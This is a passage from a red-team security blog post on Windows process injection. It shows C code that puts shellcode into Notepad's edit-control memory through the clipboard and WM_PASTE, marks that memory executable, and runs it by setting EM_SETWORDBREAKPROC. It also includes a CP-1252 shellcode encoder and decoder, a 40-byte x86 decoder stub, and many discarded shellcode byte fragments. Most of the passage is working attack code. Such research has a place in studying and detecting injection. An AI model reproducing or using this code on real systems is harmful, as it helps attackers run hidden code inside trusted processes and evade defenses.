    emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
    
    // get the process id for the window
    GetWindowThreadProcessId(ecw, &pid);
    
    // open the process for reading and changing memory permissions
    hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);

    // copy some test data to the clipboard
    memset(buf, 0x4d, sizeof(buf));
    CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
    
    // loop until target buffer address is stable
    lastbuf.p = NULL;
    r = FALSE;

    for(;;) {
      // read the address of input buffer     
      ReadProcessMemory(hp, emh.p, 
        &embuf.p, sizeof(ULONG_PTR), &rd);

      // Address hasn't changed? exit loop
      if(embuf.p == lastbuf.p) {
        r = TRUE;
        break;
      }
      // save this address
      lastbuf.p = embuf.p;
    
      // clear the contents of edit control
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      
      // send the WM_PASTE message to the edit control
      // allow notepad some time to read the data from clipboard
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
    }
    
    if(r) {
      // set buffer to RWX
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
        
      // generate shellcode and copy to clipboard
      cs = cp1252_generate_winexec(pid, &cslen);
      CopyToClipboard(CF_TEXT, cs, cslen);
        
      // clear buffer and inject shellcode
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
      
      // set the word break procedure to address of shellcode and execute
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
      SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
      
      // set buffer to RW
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
    }
    CloseHandle(hp);
    return r;
}

6. Demonstration

Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

7. Encoding Arbitrary Data

Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

7.1 Encoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X plus 1 is allowed, goto step 6.
  3. Save escape code (0x01) to the output file or stream.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X plus 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// encode raw data to CP-1252 compatible data
static
void cp1252_encode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if the result of c + 1 is disallowed
      if(!is_decoder_allowed(c + 1)) {
        // write escape code
        putc(0x01, out);
        // save byte XOR'd with the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

7.2 Decoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape code, goto step 6.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X – 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// decode data processed with cp1252_encode to their original values
static
void cp1252_decode(FILE *in, FILE *out) {
    uint8_t c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape code
      if(c == 0x01) {
        // read next byte
        c = getc(in);
        // XOR the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte minus one
        putc(c - 1, out);
      }
    }
}

The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

; cp1252 decoder in 40 bytes of x86/amd64 assembly
; presumes to be executing in RWX memory
; needs stack allocation if executing from RX memory
;
; odzhan

    bits 32
    
    %define CP1252_KEY 0x4D
    
    jmp    init_decode       ; read the program counter
    
    ; esi = source
    ; edi = destination 
    ; ecx = length
decode_bytes:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; skip null byte
    lodsb                    ; read next byte
    xor    al, CP1252_KEY    ; c ^= CP1252_KEY
save_byte:
    stosb                    ; save in buffer
    lodsb                    ; skip null byte
    loop   decode_bytes
    ret
load_data:
    pop    esi               ; esi = start of data
    ; ********************** ; decode the 32-bit length
read_len:
    push   0                 ; len = 0
    push   esp               ; 
    pop    edi               ; edi = &len
    push   4                 ; 32-bits
    pop    ecx
    call   decode_bytes
    pop    ecx               ; ecx = len
    
    ; ********************** ; decode remainder of data
    push   esi               ; 
    pop    edi               ; edi = encoded data
    push   esi               ; save address for RET
    jmp    decode_bytes
init_decode:
    call   load_data
    ; CP1252 encoded data goes here..
    

The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

8. Acknowledgements

I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.

9. Further Research

List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

10. Code Scrapheap

What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.

"\xb0\x00"     /* mov  al, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\xb4\x00"     /* mov  ah, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\x98"         /* cwde                   */

Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

"\xf8"                 /* clc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

"\x6a\x00"             /* push  0                     */
"\x58"                 /* pop   rax                   */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\xf9"                 /* stc                         */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\x14\x00"             /* adc   al, 0                 */

Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

"\x6a\x00"     /* push 0                 */
"\x54"         /* push rsp               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xff\x00"     /* inc  dword [rax]       */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x99"         /* cdq                    */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x92"         /* xchg eax, edx          */

I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There’s no JMP, Jcc or CALL instructions that can be used directly.

If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

"\x39\xd8"             /* cmp   eax, ebx           */

There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.

"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5e"                 /* pop   rsi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x53"                 /* push  rbx                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xa7"                 /* cmpsd                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x1c\x00"             /* sbb   al, 0                  */
"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */

Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

"\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x9e"                 /* sahf                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */

Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.

Adding -1 will subtract 1 from the variable EAX contains the address of.

"\x6a\x00"             /* push  0                    */
"\x54"                 /* push  rsp                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x83\x00\xff"         /* add   dword  [eax], -1  */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */

Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesn’t work once the addition after STC is executed.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1c\x00"             /* sbb   al, 0               */
"\x6a\x00"             /* push  0                   */
"\x54"                 /* push  rsp                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x5f"                 /* pop   rdi                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

The next snippet simply copies the value of RCX to RAX. It’s overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.

"\x6a\x00"             /* push  0              */
"\x54"                 /* push  rsp            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x51"                 /* push  rcx            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x8f\x00"             /* pop   qword [rax]    */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x5f"                 /* pop   rax            */

Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

    push   0
    pop    rcx
    xnop
    push   rbp              ; save rbp      
    xnop
    ; 1. ====================================
    push   0                ; store 0 as X
    push   rsp              ; store &X
    xnop
    pop    rbp              ; load &X
    xnop
    ; 2. ====================================
    mov    eax, 0xFF001200  ; load 0xFF001200
    add    [rbp], ah        ; add 0x12
    adc    al, 0            ; AL = CF
    push   rbp              ; store &X
    xnop
    push   rsp              ; store &&X
    xnop
    pop    rax              ; load &&X
    xnop
    inc    dword[rax]       ; &X++
    pop    rbp
    xnop
    add    [rbp], al        ; add CF
    ; 3. ====================================

Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving here in the event R8 is already zero..

    ; read byte from table 2
    lodsb
    add [rbp], cl
    add byte[rax+r8+1], al   ; copy to table 1
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+3], al
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+5], al
    add [rbp], cl
    
    ; and so on..
    
    ; execute
    push rax
    ret

Using the above instruction to add 8-bits to 32-bit word.

    ; step 1
    push   rax              ; save pointer
    add    byte[rbp], cl
    add    byte[rax+r8], bl ; A[0] += B[0]
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 2
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24   
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[1] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 3
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[2] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl

    ; step 4
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[3] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 5
    rol    dword[rax], 24
    add    byte[rbp], cl

As you can see, it’s a mess to try simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉

This entry was posted in assembly, injection, process injection, programming, redteam, security, shellcode, windows and tagged , , , , . Bookmark the permalink.

3 Responses to Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

  1. Pingback: Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC | OSINT

  2. Oliver Lavery says:

    Hah, it’s great to see this stuff revisited nearly 20 years later 👍

    Liked by 1 person

  3. Pingback: 7月9日每日安全热点 – Memory Tagging for the Kernel:Tag-Based KASAN-中国宏阔黑客联盟|白帽黑客|网络渗透技术|网站安全|移动安全|通信安全

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s